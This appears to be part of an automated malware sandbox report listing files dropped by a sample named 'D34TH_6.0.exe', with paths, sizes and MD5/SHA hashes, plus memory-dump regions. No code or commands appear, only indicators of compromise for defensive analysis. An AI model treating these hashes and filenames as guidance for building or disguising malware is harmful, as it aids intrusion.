57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\_tkinter.pyd
Filesize
62KB

MD5
1df0201667b4718637318dbcdc74a574

SHA1
fd44a9b3c525beffbca62c6abe4ba581b9233db2

SHA256
70439ee9a05583d1c4575dce3343b2a1884700d9e0264c3ada9701829483a076

SHA512
530431e880f2bc193fae53b6c051bc5f62be08d8ca9294f47f18bb3390dcc0914e8e53d953eee2fcf8e1efbe17d98eb60b3583bccc7e3da5e21ca4dc45adfaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\base_library.zip
Filesize
1.3MB

MD5
08332a62eb782d03b959ba64013ac5bc

SHA1
b70b6ae91f1bded398ca3f62e883ae75e9966041

SHA256
8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

SHA512
a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\libcrypto-3.dll
Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\libffi-8.dll
Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\python312.dll
Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\select.pyd
Filesize
29KB

MD5
92b440ca45447ec33e884752e4c65b07

SHA1
5477e21bb511cc33c988140521a4f8c11a427bcc

SHA256
680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

SHA512
40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\tcl86t.dll
Filesize
1.7MB

MD5
21dc82dd9cc445f92e0172d961162222

SHA1
73bc20b509e1545b16324480d9620ae25364ebf1

SHA256
c2966941f116fab99f48ab9617196b43a5ee2fd94a8c70761bda56cb334daa03

SHA512
3051a9d723fb7fc11f228e9f27bd2644ac5a0a95e7992d60c757240577b92fc31fa373987b338e6bc5707317d20089df4b48d1b188225ff370ad2a68d5ff7ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\tcl\encoding\cp1252.enc
Filesize
1KB

MD5
e9117326c06fee02c478027cb625c7d8

SHA1
2ed4092d573289925a5b71625cf43cc82b901daf

SHA256
741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e

SHA512
d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\tcl\init.tcl
Filesize
25KB

MD5
fe92c81bb4acdda00761c695344d5f1e

SHA1
a87e1516fbd1f9751ec590273925cbc5284b16bd

SHA256
7a103a85413988456c2ad615c879bbcb4d91435bcfbbe23393e0eb52b56af6e2

SHA512
c983076e420614d12ab2a7342f6f74dd5dcdad21c7c547f660e73b74b3be487a560abd73213df3f58be3d9dbd061a12d2956ca85a58d7b9d9e40d9fa6e6c25eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\tk86t.dll
Filesize
1.5MB

MD5
9fb68a0252e2b6cd99fd0cb6708c1606

SHA1
60ab372e8473fad0f03801b6719bf5cccfc2592e

SHA256
c6ffe2238134478d8cb1c695d57e794516f3790e211ff519f551e335230de7de

SHA512
f5de1b1a9dc2d71ae27dfaa7b01e079e4970319b6424b44c47f86360faf0b976ed49dab6ee9f811e766a2684b647711e567cbaa6660f53ba82d724441c4ddd06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\unicodedata.pyd
Filesize
1.1MB

MD5
16be9a6f941f1a2cb6b5fca766309b2c

SHA1
17b23ae0e6a11d5b8159c748073e36a936f3316a

SHA256
10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

SHA512
64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47562\zlib1.dll
Filesize
143KB

MD5
297e845dd893e549146ae6826101e64f

SHA1
6c52876ea6efb2bc8d630761752df8c0a79542f1

SHA256
837efb838cb91428c8c0dfb65d5af1e69823ff1594780eb8c8e9d78f7c4b2fc1

SHA512
f6efef5e34ba13f1dfddacfea15f385de91d310d73a6894cabb79c2186accc186c80cef7405658d91517c3c10c66e1acb93e8ad2450d4346f1aa85661b6074c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t5dvs3zo.qxg.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\1.vbs
Filesize
51B

MD5
57e79266558ded0c18184ff6ba5e9c33

SHA1
914ca69fbcb16441a27f9cde4f823600cd9d6042

SHA256
0e8739e1b45ccd73c96c7241cc6892e1281398a8c63577b83db75eb2b222636e

SHA512
761b7a3829e29ee381c85c7b8f567d4ef87683fc77a6d22f11eb9b36f58baa1e1fbb338fae1274036dd8b89ee91744795e187a562c7adc9e9949ce857ff2c9f3

Download Submit
C:\Users\Admin\Desktop\2.vbs
Filesize
64B

MD5
c50aeb8493072b290558aa0a2ab6d9a1

SHA1
3fa7e066d06dafa4463b3e8d2733eeb44b2a5667

SHA256
1c72f290f69aa63a23040b278958daa9045cb7865c4bc0f0fbf912bae0775de1

SHA512
78e628812a801267e4c1402c4cb71fff235cb80be41d7312396b9936b08932263fcb84b5ebfec942e9ec97796d860f7b5d776ccc4c974265c707e04978bb7f1e

Download Submit
C:\Users\Admin\Desktop\5.exe
Filesize
7B

MD5
a0f6b0610f7d9c76ad907e6678344e03

SHA1
8d64b952b2725dadb54d7f67b1b66d62b49ead6e

SHA256
2200c1cd50ad9228c73ad8335f191c0828cce777fc4d20fbeeb0783a3e17f8c3

SHA512
b273fd7ed575ff0176ff09ac6ab3860471682f6ddb2438d03313d1f48fd780a000efd44d51cc1efe2c47de65936f7ea6f586ad9a240a8d3646a59ced00944648

Download Submit
C:\Users\Admin\Desktop\D34TH_6.0.exe
Filesize
9.8MB

MD5
117599f001a42da3cea2d75041f43bff

SHA1
cd183b9c287b34c1bd1540fc825c36c735caec7f

SHA256
562469c75efaa1124ff7841d1c32872d4854d78108457040d568d509ddae69b5

SHA512
ab2391ca9a242ca0eaeb9eec57bed714a872633f2213e8860e69689680f33f0a53452eea4c271d643ac2e2f43ec7551e7ed67b175969b0446bff89eafba76174

Download Submit
C:\Users\Admin\Desktop\vwiwus.bat
Filesize
217B

MD5
713083b182cad90d95b4c3906e048ad2

SHA1
cf31a5d99992b54063cff4fc77c391515e7afbdd

SHA256
ba12a301e3e3cda95a256369aa5e9bc6cb88d637418e881e4b2e42761ab62f38

SHA512
a3e83b2467b44125f195d7b04e2a60dc2b27dffd6b9993ef6ba318e3b028dfcea8a4b5696104675b81ecebb5309d76a3134aa35cce8a74d3eb68c10ce9db7e42

Download Submit
memory/1592-5-0x000001D340C50000-0x000001D340C72000-memory.dmp

Filesize
136KB

Download
memory/4388-299-0x000001E91AAA0000-0x000001E91ACBC000-memory.dmp

Filesize
2.1MB

Download
memory/4532-1675-0x00007FFDB22E0000-0x00007FFDB230A000-memory.dmp

Filesize
168KB

Download
memory/16268-3429-0x00007FFDCEFF0000-0x00007FFDCF2B9000-memory.dmp

Filesize
2.8MB

Download